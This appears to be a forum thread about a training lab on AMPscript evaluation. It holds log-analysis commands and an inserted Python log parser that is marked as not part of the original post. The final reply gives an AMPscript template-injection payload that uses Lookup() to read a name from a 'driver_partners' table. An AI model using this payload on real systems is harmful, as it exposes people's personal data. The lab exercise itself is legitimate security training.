Forum Discussion

GusC
2 months ago

Threat Research: AMPscript Analysis

This is one of those labs that I return to periodically and then abandon after half an hour whilst scratching my head... Does anyone have any pointers about how to approach this?

Which fields need to be populated in the webform? 

And which Test Contact Key is used?

The one that's prepopulated: acb1730c-c3dc-4c1a-ad3d-207216370def

or the one in the briefing: e2e6555a-64a5-43ed-984e-1d342780b72f

Many thanks in advance - Gus


    • GusC

      Hello - I have - do you have any other pointers? Thanks - G

  • You have the issue that the response is always ""?
    And also curl with the address or local IP just gives a HTTP 500?
    And if you enter an invalid endpoint, it's still ""? 
    Same here. 

  • OK, I have solved the lab again...
    So, let's start...

    First get the IP address. How? Count which IP address is used the most...
    Something like this will give you some data:

    grep -i - * | awk '{print $8}' | sort | uniq -c | sort -n

    Once you have the IP address, check again...

    ml-user@ampscript-evaluation:~/Desktop/logs$ grep "n.n.n.n" *
    api.log.1:2019-01-17 09:37:23,026 - [INFO] - AMPS_test_bed - n.n.n.n requested http://web-hook.imlcabs.iml/
    api.log.1:2019-01-17 09:37:23,117 - [INFO] - AMPS_test_bed - n.n.n.n requested http://web-hook.imlcabs.iml/preview?….business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[
    api.log.1:2019-01-17 09:37:33,644 - [INFO] - AMPS_test_bed - Processing message from n.n.n.n: %%[
    api.log.1:2019-01-17 09:37:33,690 - [INFO] - AMPS_test_bed - n.n.n.n authenticated successfully with contact key abcdefgh-ijkl-mnop-qrts-uvwxyz123456

    --> abcdefgh-ijkl-mnop-qrts-uvwxyz123456 will be what you want... that's the lookup key and the test contact key

    Also note the URL used:

    http://web-hook.imlcabs.iml/preview?….business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[

    If you check the data, you'll even see the 'Message' used.

    If you do your query (the log will tell you what you need to enter), you'll get an answer/result like:

    {"result":"Hi there I'm DARTH_VADER_YOUR_MASTER and I created this tool.\r"}

    (of course it's not Darth Vader) :)

    And when you dig further in the log, around line 940, you'll find the last message to re-use and count...
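The log analysis described in the post above, as an added example in Python rather than the grep/awk one-liner (this is not part of the post or of the lab): it parses api.log lines in the format quoted above, counts the requesting IPs, pulls the contact key from the "authenticated successfully" line and URL-decodes the message parameter of the /preview request, which is the CyberChef/urldecode step done in code. The sample log is constructed here; the IP addresses, the partner_uuid value and the exact request contents are assumptions, and only the log layout, the web-hook.imlcabs.iml URL and the placeholder contact key come from the post.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, quote, urlsplit

# AMPscript message in the shape discussed in the thread. The partner_uuid
# value is a placeholder, not a real lookup key from the lab.
AMPSCRIPT = (
    "%%[\n"
    "SET @firstName = Lookup('driver_partners', 'firstname', 'partner_uuid', "
    "\"PLACEHOLDER-UUID\")\n"
    "]%%\n"
    "Hi there I'm %%=V(@firstName)=%% and I created this tool."
)

# The /preview request as it would be logged: the message is URL-encoded
# once, so "%%[" appears as "%25%25%5B" (the "%25%25[" seen in the post).
PREVIEW_URL = (
    "http://web-hook.imlcabs.iml/preview?business_unit=&endpoint="
    "&extension=driver_partners&headers=&message=" + quote(AMPSCRIPT, safe="")
)

# Constructed sample log (not real lab data); the two IPs are documentation
# addresses standing in for the n.n.n.n in the post.
SAMPLE_LOG = "\n".join([
    "2019-01-17 09:37:20,001 - [INFO] - AMPS_test_bed - 198.51.100.9 requested http://web-hook.imlcabs.iml/",
    "2019-01-17 09:37:23,026 - [INFO] - AMPS_test_bed - 203.0.113.7 requested http://web-hook.imlcabs.iml/",
    "2019-01-17 09:37:23,117 - [INFO] - AMPS_test_bed - 203.0.113.7 requested " + PREVIEW_URL,
    "2019-01-17 09:37:33,644 - [INFO] - AMPS_test_bed - Processing message from 203.0.113.7: %%[",
    "2019-01-17 09:37:33,690 - [INFO] - AMPS_test_bed - 203.0.113.7 authenticated successfully "
    "with contact key abcdefgh-ijkl-mnop-qrts-uvwxyz123456",
])

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) - \[(?P<level>\w+)\] - (?P<app>\S+) - (?P<msg>.*)$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
KEY_RE = re.compile(r"authenticated successfully with contact key (\S+)")
REQ_RE = re.compile(r"^(\S+) requested (\S+)$")
# grep over several files prepends "api.log.1:" to each line; strip it
GREP_PREFIX_RE = re.compile(r"^[\w.]+:(?=\d{4}-\d{2}-\d{2} )")


def parse_lines(text):
    """Yield one dict per well-formed log line, tolerating a grep 'file:' prefix."""
    for raw in text.splitlines():
        m = LINE_RE.match(GREP_PREFIX_RE.sub("", raw))
        if m:
            yield m.groupdict()


def ip_counts(text):
    """Count how often each client IP appears (the awk | sort | uniq -c step)."""
    counts = Counter()
    for rec in parse_lines(text):
        m = IPV4_RE.search(rec["msg"])
        if m:
            counts[m.group(0)] += 1
    return counts


def top_ip(text):
    """The most frequent IP is the one to look at first; None for an empty log."""
    counts = ip_counts(text)
    return counts.most_common(1)[0][0] if counts else None


def contact_keys(text, ip):
    """Contact keys this IP authenticated with (lookup key / test contact key)."""
    keys = []
    for rec in parse_lines(text):
        if rec["msg"].startswith(ip + " "):
            m = KEY_RE.search(rec["msg"])
            if m:
                keys.append(m.group(1))
    return keys


def preview_requests(text, ip):
    """(query params, URL-decoded message) for every /preview request by ip."""
    found = []
    for rec in parse_lines(text):
        m = REQ_RE.match(rec["msg"])
        if not m or m.group(1) != ip:
            continue
        url = urlsplit(m.group(2))
        if url.path != "/preview":
            continue
        # parse_qs percent-decodes each value exactly once, which is what the
        # single-encoded message in the log needs; keep_blank_values retains
        # the empty business_unit/endpoint/headers fields.
        params = parse_qs(url.query, keep_blank_values=True)
        found.append((params, params.get("message", [""])[0]))
    return found


if __name__ == "__main__":
    ip = top_ip(SAMPLE_LOG)
    print("most active IP:", ip, dict(ip_counts(SAMPLE_LOG)))
    print("contact key(s):", contact_keys(SAMPLE_LOG, ip))
    for params, message in preview_requests(SAMPLE_LOG, ip):
        print("extension:", params.get("extension"))
        print("decoded message:\n" + message)
```

Run it against the real files with `python3 this.py < <(cat api.log*)` after swapping SAMPLE_LOG for `sys.stdin.read()`; the decoded message is what goes into the Message field of the web form, and the contact key printed is the lookup key the post refers to.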


    • GusC

      Hi Netcat - yes, that's exactly what I mean. I click on "preview" on the page web-hook.imlcabs.iml and I get "" under JSON etc.

      Thanks Steven - I had already got Q5 and Q6 - I'm stuck on how to populate the web application to pull back the name of the attacker, using the key 5*** - do you have some info around that?


      • steven

        So, the basis for this hack is this --> https://www.assetnote.io/resources/research/gaining-access-to-ubers-user-data-through-ampscript-evaluation

        Try this for the message:

        Message:
        %%[
        SET @firstName = Lookup('driver_partners', 'firstname', 'partner_uuid', "5....")
        ]%%
        Hi there I'm %%=V(@firstName)=%% and I created this tool.

        BTW, you'll find all the necessary messages to solve the lab in the log. Maybe you need to use CyberChef and URL-decode.